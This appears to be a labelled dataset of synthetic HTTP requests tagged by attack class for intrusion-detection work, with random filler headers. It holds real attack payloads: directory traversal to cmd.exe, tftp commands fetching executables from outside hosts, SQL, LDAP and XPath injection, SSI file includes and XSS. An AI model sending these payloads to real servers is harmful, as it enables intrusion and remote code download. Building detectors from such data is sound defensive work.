If-None-Match: "50LT_@D2X3C0W8wFRuvs"
If-Range: *
Max-Forwards: 22
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: lsrc Ezipm=8oubz
Range: -017,-1,-32
Referer: http://www.etst.org/eM24.sh
TE: chunked
Trailer: From
User-Agent: Mozilla/3.0 (X11; U; Linux i386 9.7; lo-7t; rv:8.0.3) Gecko/80154020
UA-CPU: 68000
UA-Disp: 2630,1668,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 934x7117
Via: zoes/3.0 235.135.82.75
Transfer-Encoding: compress
Upgrade: OceeiE/8.8, btin/1.3, wrUw/4.8, toehd/0.2, t0m4l/5.1
Warning: 468 210.254.129.12 "oaerthI" 
X-Forwarded-For: 118.255.6.210
X-Serial-Number: 6943669939
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47673
Start - Id: 36600
class: OsCommanding
GET ..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.atMesat.uk
Connection: wsme
Accept: image/*, image/*, audio/*
Accept-Charset: *
Accept-Encoding: compress;q=0.5, deflate, deflate, gzip;q=0.4
Accept-Language: *
Cache-Control: no-store
Client-ip: 3.238.183.148
Cookie: mP1pjbunionJQ=4;rEzhzeiidEj8eQe=ea:3 Mwelao~reeSyt;nzgWZMC=640
Cookie2: $Version="5"
Date: Sat, 10 Sep 05 09:21:45 GMT
ETag: W/"pQOXcIItfLgaCXJGA"
Expect: 100-continue
From: oAud4eo@aM6ymuu.de
If-Modified-Since: Thu, 28 Sep 06 10:32:44 CET
If-Unmodified-Since: Sun, 28 Jun 09 01:24:08 CET
If-Match: *
If-None-Match: "y3-OKVTeDdF14ozbiQ9"
If-Range: Fri, 22 Oct 04 07:29:51 GMT
Max-Forwards: 206
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Basic RWViaWU6ZWh6c3JkYw==
Authorization: Basic aG1pbDk4YzptZTNlcA==
Range: -23163,-7
Referer: /ariih.swf
TE: gzip
Trailer: Max-Forwards
User-Agent: Mozilla/0.6 (X11; U; Open BSD i386 7.7; am-sa; rv:0.5.9) Gecko/16147396
UA-CPU: MIPS
UA-Disp: 1925,168,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: uowA1/4.3 www.eAnw04.htm
Transfer-Encoding: identity
Upgrade: uof/2.1, pIto/5.6, Weac/8.2, o0shyf/1.7
Warning: 749 www.Tr23iqts.html "ontttfrynef0akictteo" "Sun, 16 Nov 08 15:04:07 CET"
X-Forwarded-For: 2.248.231.30
X-Serial-Number: 0686987
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36600
Start - Id: 45632
class: PathTransversal
GET /DA.msf?frlceeonnparah=93339285&noafiefiuttsor=..%2F..%2F..%2FWINNT%2Fautoexec.bat HTTP/1.0
Host: 91.179.128.65
Connection: keep-alive
Accept: image/*
Accept-Charset: euc-kr;q=0.1, x-mac-chinesetrad
Accept-Encoding: *;q=0.4
Accept-Language: rslped-rs, eEIhcs-Rhy5Ua;q=0.0, 3-o;q=0.9, eyee1t-yhae, snhttnm2-Hm;q=0.4
Cache-Control: min-fresh=28795
Client-ip: 95.84.73.85
Cookie: bpneC4=s47jioUt;iwmWagn=79823;no=esloorr9;iisstyleER251iUK=rOvw.URSn;mto25ai=nef;oqr=85799
Cookie2: $Version="56"
Date: Fri, 25 Nov 05 14:30:49 CET
ETag: "PKvFDYVY3-cjVvQ"
Expect: seoOtore
From: icafeu@elilysn5.com
If-Modified-Since: Fri, 24 Jul 09 18:18:18 UTC
If-Unmodified-Since: Sun, 12 Apr 09 05:34:59 GMT
If-Match: "bAsTW383JDRa0PgbyVJ"
If-None-Match: *
If-Range: *
Max-Forwards: 18
MIME-Version: 2.8
Pragma: t='n2egn'
Proxy-Authorization: NTLM b2FhZG5ubmVzZTgwd1BHb2V0c2NpZXNiT2VtZXJhYXJvZXRuZnJhbWNhbw==
Authorization: NTLM a255b1NZdG90NjVtdGFqTzVsbGFoNHdhZWF3c3RmYXZxbm8wbE1tcmVtaHVxcQ==
Range: 41-9272,-212,7881-582
Referer: /DA2n5s/roOhtN/sripe7b/oinyceqr.pdf
TE: chunked;q=0.5,trailers
Trailer: Upgrade
User-Agent: jnub/9.1.1.0
UA-CPU: Sparc
UA-Disp: 4093,504,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 822x7787
Via: 6d3/2.2 10.77.140.109
Transfer-Encoding: identity
Upgrade: tgmy/2.8, Ns4a2/6.2
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 6406326694
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45632
Start - Id: 44098
class: OsCommanding
GET /_vti_bin/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.oUrl.de:80
Connection: raxcf1j
Accept: */*
Accept-Charset: euc-tw, koi8-r;q=0.2, iso-8859-8-i;q=0.0
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 236.2.174.53
Cookie: iiirRb1eno=eITlig3aegeOeb;Roinetofoohn=eOtsE oso;ynwemts=9282433;ouNnc=5
Cookie2: $Version="846"
Date: Sat, 17 Jul 04 07:34:26 CET
ETag: "6ppIn19@NaQSoJPiB"
Expect: 100-continue
From: ixam@eaec.uk
If-Modified-Since: Sat, 12 Dec 09 08:37:36 GMT
If-Unmodified-Since: Sat, 14 May 05 16:58:07 CET
If-Match: "Uv1ZNf812leJATaD"
If-None-Match: "V3Ha_YMdBSMA-AvjJ"
If-Range: *
Max-Forwards: 3
MIME-Version: 0.4
Pragma: cn=aLwhuimn
Proxy-Authorization: NTLM YTlha3RlZjlua29weWVzb2s3MW5yemFoMm5wbk4waVJzZW9ndG4zTGhpOGh0aQ==
Authorization: Digest uri=/taeZ9/rhunOa/vnpaf.mspx
Range: 70-
Referer: /dsOme.sh
TE: deflate;q=0.0
Trailer: If-Match
User-Agent: JdhELl (sLL_Hm; 6v2cok4; tSfXwINL)
UA-CPU: x86
UA-Disp: 6409,6413,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1501x189
Via: HTTP/3.0 135.149.112.57
Transfer-Encoding: hOUe
Upgrade: unHis2/9.7, sDw/8.7
Warning: 552 www.5qeog.tiff "0tt4tuzwrsgn" 
X-Forwarded-For: 91.48.222.8
X-Serial-Number: 388289600968011
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 44098
Start - Id: 48219
class: XSS
POST /.N9qn/3J4EOnE/b_2W3j8s2RojJ64tF/isrthho/uCqmby_x/66qlZkKVvOE/7v@Z4@wpap9c4/m8otnnln3tuyintE5ha/e3UFvVjC-mY/oyMNVXpe73/8Mt2fra5X63s.nsf? HTTP/1.1
Content-Length: 63
Content-Language: MriDr
Content-Encoding: identity
Content-Location: /hpla/iytcNtg.msf
Content-MD5: eGw1NWVVZ2U1aWVub29uYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 05 Dec 09 06:43:16 GMT
Last-Modified: Sat, 16 Sep 06 04:50:10 CET
Host: 176.7.186.249
Connection: close
Accept: */*;q=0.4
Accept-Charset: iso-10646-ucs-2;q=0.0
Accept-Encoding: <div     onmouseover   =    "  [alert  ('Aq4x9oAeto');]   "   >
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 135.195.38.233
Cookie: hrw=oWifvAlin+3Ee5;8c=037593
Cookie2: $Version="426"
Date: Fri, 18 Sep 09 12:17:49 CET
From: mcitnbOr@s4Xde.gov
If-Modified-Since: Tue, 24 Feb 09 11:22:35 CET
If-Unmodified-Since: Sat, 26 Feb 05 01:12:19 GMT
If-Match: "pjYPo@8O0.fz47-LD"
If-None-Match: "2CKxIJxA7Zi6QnuM9@A"
If-Range: Sun, 27 Aug 06 10:14:18 GMT
Max-Forwards: 822
Pragma: no-cache
Proxy-Authorization: Basic YWVhdHRxZzphc2ViaQ==
Authorization: NTLM aW1yaW91dTFlc2VhYTNvZW9zSGlpdG9hbGR5YXRzNnNkZWVp
Range: -484
Referer: http://www.FNb0sesi.fr/gealte/crlss1/aea6.tiff
TE: chunked,gzip,chunked
Trailer: Accept-Charset
User-Agent: gt2lta (nwWqug; eUWkqoK; mDXlubxA; fsGqyO; m2e2dVE)
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 7334x400
Via: 6.1 www.3Toowfnm.jpg, HTTP/2.9 147.152.152.59, Tewmx/7.4 www.deIhu23.htm
Transfer-Encoding: deflate
Upgrade: eremce/4.3, xnzi/0.6, 6tgf/7.0, eal3Sa/3.7, tio/8.3
----: -------------------------

tgtoxe=oBMfoxK&nRufbuured0snH=cq&tkReseE2=6&Har0bab0ca=62739849

End - Id: 48219
Start - Id: 40693
class: SSI
GET /oBfyjhTZPLSyKVZNvs/odO@-Gjx0dKZaTqEe@N/fhtaprupttemevso5b/beAmeholfpTodtoAobTh/c8a1F4nzQa8-zMwO/tjbQbqdfC6Bo/enehlrgoIeh3ae/hCz@B/0t6eAEDRjRPg1/sr8atCmlshrr.js?q8Esm5m1ndee9=%3C%21--+++++%23include+++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++++--%3E&ttnvsHtgel=enexec&hmBsw0hIaeuisip=55 HTTP/1.0
Host: 211.194.68.59
Connection: close
Accept: video/quicktime;q=0.8, application/*, audio/x-wav
Accept-Charset: *
Accept-Encoding: deflate, identity
Accept-Language: *;q=0.9
Client-ip: 14.224.245.40
Cookie: rool=165033;rfouwtwuh3d=747894;childtOKqpDd=of6yajy;uawedurt=otelnet-8hru1objectin;niauaoIoa7ig=11412;qmnneSrx6Unsd=liSmmIq7x
Date: Mon, 25 Jun 07 19:39:48 UTC
ETag: "z3zm_CFBKe@cMTP@"
Expect: 100-continue
From: msnbxr@rEyraj.cz
If-Modified-Since: Sun, 08 Jul 07 02:43:33 GMT
If-Unmodified-Since: Mon, 25 Apr 05 06:44:38 UTC
If-Match: "p8j8F7OyEVR9YB0K-IDV"
If-None-Match: *
If-Range: *
Max-Forwards: 377
Pragma: oyey2='oe'
Proxy-Authorization: Basic bjNpbTZuMWg6aHRoZXBl
Authorization: Digest nc=2c2EAbA0
Referer: /sntoeNyi/sird9rn/47rylcth/een6s.txt
User-Agent: Nltjseenno/0.6.3
Via: 0.2 207.9.144.4, HTTP/2.4 www.ln7aA9.shtml, 6.4 23.95.189.55:3454
Upgrade: WeTe/1.6, 8oaohe/8.2, DZe/2.4
X-Serial-Number: 7906316249

null

End - Id: 40693
Start - Id: 38004
class: LdapInjection
GET /gmerttNyedorwoosudFg/taCHatmwymVoe2/tTdxSDJlcIpdf3ywGRJ/ixeshH/q4l/hdlofmdmehE/lswmseoio/eO@ZzF4ukeQUfR-yL@n/nhn3nti9rr7ebiac8Och.jpg?oaN0endiie0d=TaTen4iyqhnoasy&n0lBnsmR=rI+ain&qrhlo4=earae&hh8lgNn=3a4s%26detSr&dza2=sqbIUd1T2q&ehnoiasUMgb=autoexecy&ptOu4c5rnodS0R=eBsa&s6oiv6niaf=asl&ilu8tnoe=ds&ucsREtmmiimncrt=6318&uwtAyngr=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.1
Host: 70.138.14.191
Connection: keep-alive
Accept: application/postscript;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 41.179.118.200
Cookie: ltnytfearluli=wmgDOQMni;0aG=rkssr;Qr7Xaenumone=1607;rnN=i|iH)cis
Cookie2: $Version="5"
Date: Wed, 02 Nov 05 19:59:02 GMT
ETag: W/"UDst@tJde@GHR5NuG09g"
Expect: 100-continue
From: inr9@eduqt.it
If-Modified-Since: Thu, 27 Aug 09 22:15:48 CET
If-Unmodified-Since: Sat, 26 Dec 09 23:22:37 GMT
If-Match: *
If-None-Match: "yuFYIrDhYCpRPiOVR"
If-Range: "lBALiuBRewy@DTjjqF"
Max-Forwards: 0260
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Digest cnonce="uskm"
Authorization: Digest response="02dffa1Fb829C3fbED3BBcFED96d7571"
Range: 17672-41
Referer: http://5uttoi.de/txje7z/y0bNI/ilsteq8/Y8snhoed.cfm
TE: trailers
Trailer: Connection
User-Agent: wlrfHeQs3/5.6.7.3.1
UA-CPU: Sparc
UA-Disp: 8564,925,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 880x8476
Via: sotboi/1.1 www.nRba8ie4.png, 1.8 www.ouxe.gif, FTP/5.6 www.tLiue.shtml
Transfer-Encoding: deflate
Upgrade: sny/6.3, evf0/1.6, an9/0.7, nscrsa/2.9
Warning: 461 www.3izrso.tiff "rrcdd92qh0Axrii" 
X-Forwarded-For: 69.225.134.146
X-Serial-Number: 800649
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38004
Start - Id: 35186
class: SqlInjection
GET /gehiha7kedtOofeofkfn/LI18qYu_F-JtmpK/JE0dS6fMfDoL22lh/rtieoeyr/td/hmoitik8Ltna/e2FEEOxaC.js?ennp=IOnnH&sesbihD6ltkfn=ru9a&hltlnnie=3&eog7uayma6gE=411494&hcws4h4meAe6lo=+Jemocha%3B%5Cq%3Aef9+&fsooag8aaotz=8680694&YhdoeliLAtsmaKE=1710&aeudly4nau95ooO=wLfoX&NoZohttps3iMV=moioRTyku9&bailbsttzTipal=Tdnh+as8&tieu=ooe&ix7omflhnnQ=chairs%27++++UNION+SELECT++++2t+++FROM+++++dba_users+++++WHERE++++name+like+++++%27%2525&aUdSeie0me=0h9lTti9rkrxih HTTP/1.1
Host: www.eorto6sii.cz
Connection: stvkn
Accept: */*;q=0.5
Accept-Charset: x-mac-hebrew, x-mac-japanese;q=0.1, windows-1251, isiri-3342;q=0.3, iso-8859-7;q=0.1
Accept-Encoding: 
Accept-Language: sl-izfrntny, kbedeta-lmHo;q=0.0, tpa-6tclhf;q=0.3
Cache-Control: only-if-cached
Client-ip: 116.56.251.175
Cookie: ssdptwo=rr7fruJeh;mmdneJoecc=9869692
Cookie2: $Version="711"
Date: Wed, 26 Jul 06 08:22:15 UTC
ETag: W/"MmDAZwouxSzTM9a"
Expect: twhn
From: as5oeh@nl7ehee.ch
If-Modified-Since: Tue, 23 May 06 16:55:25 CET
If-Unmodified-Since: Fri, 21 May 04 18:51:43 GMT
If-Match: *
If-None-Match: "UkwHvXsSWbTZVHc834"
If-Range: *
Max-Forwards: 1
MIME-Version: 6.3
Pragma: Tso='beetzow'
Proxy-Authorization: ortr bdoanD=ot23oe
Authorization: ygte I5tn=ebhl
Range: -76801,392-,94069-
Referer: /zarope/iodabto/ic3b.exe
TE: deflate
Trailer: Referer
User-Agent: hu5ePrVu http://www.rthSE.st
UA-CPU: StrongARM
UA-Disp: 1981,291,8
UA-Color: color32
UA-Pixels: 0990x1742
Via: FTP/3.0 www.idnZ5dhb.shtml:8947, 0.8 www.eosg.tiff, 8.2 226.51.246.82
Transfer-Encoding: ewyn
Warning: 913 12.114.230.71:1507 "rGsmdofPbfah2t8sgGp" "Tue, 13 Jul 04 12:14:20 GMT"
X-Forwarded-For: 74.88.12.154
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35186
Start - Id: 39484
class: SSI
PUT /n7lhnwimxuiohe0e3D/cePh2.X_StHur./itnos/yV65likerYS/msq6o/czniYv7snal/eftnMhras0o/3eokOkgvBE.shtml? HTTP/1.0
Content-Length: 284
Content-Language: DEVlec,uam
Content-Encoding: identity
Content-Location: /goiliahn/nr1xvoet/i5hd3p/n6ko.msf
Content-MD5: bnRwZGVaaHRudXJzY2wxaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 05 Jan 04 04:01:51 CET
Last-Modified: Tue, 23 Nov 04 24:13:19 GMT
Host: 176.162.99.40
Connection: Osot
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.4
Accept-Language: R0sts-a
Cache-Control: min-fresh=7
Client-ip: 128.206.102.122
Cookie: olbwjnv=<!--#echo var="date_gmt"-->
Cookie2: $Version="855"
Date: Fri, 27 May 05 06:49:44 UTC
ETag: W/"8wf2.lQjUcaE8GJesoy"
Expect: 100-continue
From: etna6ghR@shets.ch
If-Modified-Since: Tue, 05 May 09 07:20:32 CET
If-Unmodified-Since: Sun, 16 Aug 09 04:34:37 CET
If-Match: "vbNlkFSzUc8hF8@"
If-None-Match: "8ehW8ZK5Z_SyyEjc89"
If-Range: Thu, 01 Apr 10 10:47:54 CET
Max-Forwards: 358
MIME-Version: 6.7
Pragma: no-cache
Authorization: NTLM dHRpMHVwdGpzeWVzM1oydWU0dTVlb3lhaTBmdzI3YUli
Range: 27876-645677,2-,93777-
Referer: http://he1ioi.st/wrecoel/ghcunnda/lkyeM/uGRl.asp
TE: chunked;q=0.7,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/2.1 (compatible; Konqueror/3.6; Open BSD i586; ailbo4p; Ttqzlwssi)
UA-CPU: MIPS
UA-Disp: 0825,547,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 890x8709
Via: HTTP/0.6 www.dne9as.gif:72222, HTTP/4.8 www.SrRwpb3e.htm:3
Transfer-Encoding: gzip
Upgrade: orrhwl/0.7, tca0e/0.7
Warning: 917 16.207.105.181 "mish" "Fri, 20 Mar 09 11:49:12 GMT"
X-Serial-Number: 6016144
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

UeH0=deOVssG1s&vrdtf9qlapqrwo=13546&A6f0AEFrcpWv2T=fupdaterriiijle?rat &c6AIaotR7obbuea=95079285&s.autoexecOkI4=2&e9o0eHr2=20&wAP3p7k93R=aFabOnPxoa&coko= tyhUlaRkt&Lr=t343tceqalt&aezujnvsl=11167917&3ONV3zB@v@r=711&EPd@=A &aM60eb2negm=w1h2i&hlpt=wdln4nmvae&vQ16JexecPGZqboot.ini=pooa

End - Id: 39484
Start - Id: 35839
class: XPathInjection
GET /p54alm/_JfKLcakrF/oe6iseli/gnhlOo/4dpQp.u/8qKY/a6/taeas9tsveobc/4HZsUg6iv9Q/7cvissfm1qr/cL/vB.asmx?fbQ9LNY.PzA=sxEIDc&esha=se7%27%5D+++%7C++++P+%7C+++++%2F%2Fuser%5B+++name%2Ftext%28+++%29++%3D++%279l8&3fkineoenoadig2=4&pe8f=Rtmpeph&leaeilhopa5=ent4ei7oevnes+&1usnroiumetc5=imonadcTeuS&romt=ee9cms1&9nougae3=thetg&AVKNXbdhqhrpassthru=autoexecn+al&rlmt6fpttEdsaa=e&PnguseYadiourtt=76857&ai=oCuV7hksoL5 HTTP/1.0
Host: 47.49.199.0:3848
Connection: motnsyo
Accept: video/quicktime
Accept-Charset: *
Accept-Encoding: gzip;q=0.4, identity, deflate;q=0.8, identity;q=0.9, deflate
Accept-Language: *
Cache-Control: max-age=9
Client-ip: 48.181.108.67
Cookie: rtbhesl=et2irxr2hgsmew7hMX;sk=l 5a);hyeSoe='uce o nEre;hs9tnma=r?c@;iAughsa=4;ea=akW@57JLwM
Cookie2: $Version="003"
Date: Fri, 06 Aug 04 23:52:03 UTC
ETag: "aq3Kr@.usbQW67kgtl"
Expect: 100-continue
From: t6Hzyl@dtgtOents.biz
If-Modified-Since: Tue, 31 Aug 04 23:10:03 GMT
If-Unmodified-Since: Tue, 29 Apr 08 09:14:54 UTC
If-Match: *
If-None-Match: "Q.FWvqyKcZ9A1-P0qGi"
If-Range: *
Max-Forwards: 72
MIME-Version: 8.2
Pragma: Nr='jxxc'
Proxy-Authorization: do1ee dtreee=is8turnl
Authorization: 7sPd lome=vee8e
Range: 77-,-9
Referer: /e9aslm/3tEhitA3/etVzhS/fncln/syfR.msf
TE: chunked,deflate;q=0.7
Trailer: Connection
User-Agent: Mozilla/2.6 (compatible; ee3altS; Linux i586; ngio; nzet)
UA-CPU: MIPS
UA-Disp: 747,476,16
UA-OS: FreeBSD
UA-Pixels: 4135x5853
Via: th9os/5.5 150.159.225.250, HTTP/9.9 www.aleoNiT.htm:91
Transfer-Encoding: identity
Upgrade: oyytm/9.6, hhc/4.5, Ojwace/7.1, toww7E/9.4
Warning: 327 215.134.162.135 "tumeaatn0ePv5noa" "Fri, 09 Dec 05 05:29:32 UTC"
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 4375504120
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35839
Start - Id: 44044
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.1
Host: www.oybx4rpbse.de
Connection: sccslt
Accept: */*;q=0.6
Accept-Charset: iso-8859-15;q=0.5, euc-cn;q=0.4, big5
Accept-Encoding: deflate, deflate;q=0.9, gzip
Accept-Language: *
Cache-Control: max-age=65
Client-ip: 11.19.174.55
Cookie: 0mtas=29;6nelO2=S;pxl=516;tetr=3653354192
Cookie2: $Version="20"
Date: Sat, 28 Feb 09 13:58:41 UTC
ETag: "8UxO4gjUxGz_xq4DjY"
Expect: 100-continue
From: 6aep@Eebnu.org
If-Modified-Since: Sat, 30 May 09 20:22:03 CET
If-Unmodified-Since: Thu, 08 Apr 10 17:29:06 UTC
If-Match: *
If-None-Match: "cvZ-j7azdGPgm9I4"
If-Range: Thu, 01 Dec 05 04:13:54 CET
Max-Forwards: 6936
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: 3kfrae lae59lhs=Se9l
Authorization: Digest qop=auth
Range: 67-764741,470518-20,3-202913
Referer: /aoOMi7t2/ek9sgemc/uce1.msf
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/1.5 (Windows; U; Win 9x 1.4; at-hN; rv:9.3.3) Gecko/99266316
UA-CPU: PowerPC
UA-Disp: 6819,8710,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 695x429
Via: 6.7 151.240.242.79:1499, FTP/5.5 www.enRa.tiff
Transfer-Encoding: gzip
Upgrade: Eaxve/8.7, yk0s/2.8
Warning: 003 www.easrIe.js "dEiywrccwaehsomosn" "Sun, 28 Mar 04 08:37:49 UTC"
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: ------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 44044
Start - Id: 45251
class: PathTransversal
GET .////////////////////////? HTTP/1.0
Host: 159.122.147.216
Connection: keep-alive
Accept: image/*;q=0.5
Accept-Charset: shift_jis;q=0.9, windows-1251
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=85
Client-ip: 225.124.231.31
Cookie: Tcoqa=Trsbkvseuu;krbruSehmanqdo=et6 ;eitx4D=gfedtrns;nERtxIr=eu81e@
Cookie2: $Version="34"
Date: Sun, 15 Feb 04 16:18:31 CET
ETag: W/"UupAiL9uu.UIpIzLm."
Expect: nT6mf=6igw
From: 77tu@22noeois.uk
If-Modified-Since: Tue, 29 Dec 09 19:41:09 GMT
If-Unmodified-Since: Thu, 07 Jul 05 01:04:26 UTC
If-Match: *
If-None-Match: "ZnGQD8BYj2k0iDd9UR"
If-Range: "doClmfgmdUEz68FTZBF"
Max-Forwards: 4
MIME-Version: 1.7
Pragma: sli=lctxBCei
Proxy-Authorization: Digest qop=evai40
Authorization: hTw6at eefh3r=mlfF
Range: 220-5761,42620-
Referer: /eter/nsri/alEttop/sewArrg/aenoEHeu.wav
TE: deflate,trailers,deflate;q=0.1
Trailer: Accept
User-Agent: Mozilla/8.5 (compatible; MSIE 3.1; Win98; ernfuy)
UA-CPU: x86
UA-Disp: 711,6058,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2272x045
Via: ucew5/1.5 242.118.253.14, gepilt/4.1 www.eoeYJ4li.tiff
Transfer-Encoding: compress
Upgrade: b9r/9.4
Warning: 831 www.rueghla.htm "ecA7eejeodtti" 
X-Forwarded-For: 181.253.151.130
X-Serial-Number: 67855229
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 45251
Start - Id: 39673
class: SSI
GET /a@/@9ws.png?lnu0hbh=nph-tatoo&ewmewe9e=w3zu9J&cru=ntBSdhoT&sNbnootlOpihXi=%3C%21--%23include++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+--%3E&3GwgetlBVX=aa8&4brtmmaitc=ep&fAaotigpsmhrrTo=88 HTTP/1.1
Host: www.zotie.org
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: big5
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 17.56.25.243
Cookie: tfnanneccoere7=epNh:;iwcyEtpdtt=kihnull@|c;insertrt]at5l/a3n;qeiowt=264287;cb=eh0;7xusr2kpgroup byIB=yjmbXasQn1h;rfenrOr=scLbEguV6ra
Cookie2: $Version="57"
Date: Wed, 23 Jul 08 08:01:40 UTC
ETag: "MnC6RG5yCfdECDak"
Expect: 100-continue
From: l5vtEst@R8caTefna.fr
If-Modified-Since: Mon, 15 Oct 07 02:29:13 UTC
If-Unmodified-Since: Sun, 09 May 04 23:21:20 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 6.1
Pragma: ettdi=ter
Proxy-Authorization: Basic Z2NtdGE6aGFucw==
Authorization: Basic aDB0c3VzYTp0YXROdg==
Range: 047-,52-2392,30343-939979
Referer: /tpart/ReiTshrs/tenokgx/athRiyI/oihrd7rs.dll
TE: trailers,deflate
Trailer: Upgrade
User-Agent: ebaehyh9lc81o
UA-CPU: 68000
UA-Disp: 0266,938,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 726x074
Via: 2.0 21.233.60.202, FTP/3.7 26.203.213.23
Transfer-Encoding: deflate
Upgrade: t0igo/9.1, p2G5i/3.1, nwl5/5.4, hec/0.3, tQr/0.4
Warning: 733 214.19.169.247 "I5ohianit" 
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 919920115
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39673
Start - Id: 42965
class: OsCommanding
GET /7zjgJh-O/zrK./eixnWO3LQ97/eFSiJS.LPus_/eOpJwPfHz6Qp4pHQlg/2eRmyDme08y8Rerd3/hrekn/nELMDGqP5Ih@/rJW97pBV/al9K-LY.exe?busrcopyjgphgroup byoZl=as5xp_tdincludeOer&iopaHbae9=679&lnT=a+&ijcaSJ=rbtcat%29c29csn&obmsESNDerlo=KigEpvasx8rpT0aii HTTP/1.1
Host: 51.213.245.193
Connection: keep-alive
Accept: text/html;q=0.3, video/*;q=0.5, audio/*;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 162.231.56.83
Cookie: lE9moUhozid=tftp -c    get    23.217.237.174:/mese/itor.exe   |;sik1=qmD57
Cookie2: $Version="940"
Date: Sun, 07 Feb 10 01:04:18 CET
ETag: "BY_3eSTW3yc4dwD-"
Expect: 100-continue
From: aaoq@n8t5el2e.org
If-Modified-Since: Thu, 02 Apr 09 19:54:15 UTC
If-Unmodified-Since: Sat, 03 May 08 23:32:37 CET
If-Match: *
If-None-Match: "wNHvja0wtmDajYnC"
If-Range: *
Max-Forwards: 17
MIME-Version: 5.1
Pragma: sa1td='a'
Proxy-Authorization: Basic aWl3dDp5aWNidHQ=
Authorization: NTLM enhFazBlaXRyaGVhc250NHYwZW9ubXVqbG9mbXJkNlVockVvb3RldWlWbg==
Range: 135953-1
Referer: http://ssbnrs.st/wirOtvn.jpeg
TE: trailers
User-Agent: Mozilla/0.2 (X11; U; Open BSD i586 3.7; tw-nq; rv:8.0.3) Gecko/02582762
UA-CPU: StrongARM
UA-Disp: 702,4199,8
UA-Color: color32
Via: 7.8 www.ecdao.shtml, 6.4 224.28.174.70:74892
Transfer-Encoding: gzip
Warning: 517 202.242.64.75 "yesnOrnoyqnhoe5vtzi" "Mon, 26 Dec 05 17:30:01 GMT"
X-Forwarded-For: 145.166.242.21
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42965
Start - Id: 41424
class: SqlInjection
POST /1lCglute/ar/lEzuehhe2oq/eehciMUfh/dp23PlSrw/6kU/nF5wbgW2IAEexVge6/2mrfqT/u-nU0W6v_s2ummtR/UM1ppUI/bEctrntetnts.php? HTTP/1.1
Content-Length: 196
Content-Language: nau,4rba,aaomi1ia
Content-Encoding: compress
Content-Location: http://iA8Usr.com/snenw5/Ql6edi/ctentA.exe
Content-MD5: aW5zY3Nuc3VyYmVlaWJ0SA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 08 Feb 10 12:44:36 UTC
Last-Modified: Fri, 06 May 05 01:31:45 UTC
Host: 190.24.185.11
Connection: close
Accept: text/*;q=0.3, audio/x-wav
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 196.36.129.201
Cookie: _bgsoundokw=5039
Cookie2: $Version="458"
Date: Fri, 29 Jul 05 23:32:02 CET
ETag: W/"4aBq-mQ1_DiT7vYxf"
Expect: enoavte1=egee
From: hbituu@nl5IshaU.be
